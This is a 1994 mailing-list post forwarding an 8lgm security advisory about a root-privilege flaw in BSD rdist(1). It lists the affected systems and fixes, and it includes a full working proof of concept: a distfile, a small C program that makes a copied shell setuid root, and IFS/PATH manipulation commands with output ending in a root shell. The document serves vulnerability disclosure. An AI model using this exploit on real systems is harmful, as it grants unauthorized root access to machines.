netbsd-bugs: rdist(1) security bug from comp.security.unix

Subject: rdist(1) security bug from comp.security.unix
To: None <netbsd-bugs@sun-lamp.cs.berkeley.edu>
From: Frank van der Linden <vdlinden@fwi.uva.nl>
List: netbsd-bugs
Date: 03/06/1994 16:28:01
This advisory has been sent to:

	comp.security.unix
	INFOHAX			<infohax-emergency@stormking.com>
	BUGTRAQ			<chasin@crimelab.com>
	CERT/CC			<cert@cert.org>

===========================================================================
		[8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991

PROGRAM:

	rdist(1)	(/usr/ucb/rdist or /usr/bin/rdist)

VULNERABLE OS's:

	SunOS 4.1.2 or earlier (Patch-ID# 100383-06 fixes this)
	A/UX 2.0.1
	SCO 3.2v4.2
	BSD NET/2 Derived Systems

	Most systems supporting BSD rdist


DESCRIPTION:

	rdist(1) uses popen(3) to execute sendmail(8) as root.  It can
	therefore be made to execute arbitary programs as root.

IMPACT:

	Any user with access to rdist(1) can become root.

REPEAT BY:

	This example demonstrates how to become root on most affected
	machines by creating a set-uid root shell.  Please do not do
	this unless you have permission.

	Create the following file, 'distfile':

8<--------------------------- cut here ----------------------------
HOSTS = localhost
FILES = BullInTheHeather
${FILES} -> ${HOSTS}
        install /tmp/1 ;
        notify user ;
8<--------------------------- cut here ----------------------------

	Create the following file, 'usr.c':

8<--------------------------- cut here ----------------------------
main()
{
	setuid(0);
	chown("sh", 0, 0);
	chmod("sh", 04755);
	exit(0);
}
8<--------------------------- cut here ----------------------------

	(Lines marked with > represent user input)

>	% cp /bin/sh .
>	% cc -o usr usr.c
>	% set path=(. $path)
>	% setenv IFS /
>	% rdist
	updating host localhost
	rdist: BullInTheHeather: No such file or directory
	notify @localhost ( user )
>	% ls -l
	-rwsr-xr-x  1 root       106496 Mar  4 00:25 sh
>	% ./sh
	#
	
FIX:

	1. Contact your vendor for a fix.  Sun's latest rdist patch
	   (Patch-ID# 100383-06) fixes this hole in SunOS.  Some vendors
	   closed this hole while fixing an unrelated problem published
	   by CERT in their advisory: CA-91:20.rdist.vulnerability.

	2. In the meantime, restrict access to rdist.


FEEDBACK AND CONTACT INFORMATION:

	8lgm-bugs@bagpuss.demon.co.uk		(To report security flaws)

	8lgm-request@bagpuss.demon.co.uk	(Request for [8lgm] Advisories)

	8lgm@bagpuss.demon.co.uk		(General enquiries)

	System Administrators are encouraged to contact us for any
	other information they may require about the problems described
	in this advisory.

	We welcome reports about which platforms this flaw does or does
	not exist on.


------------------------------------------------------------------------------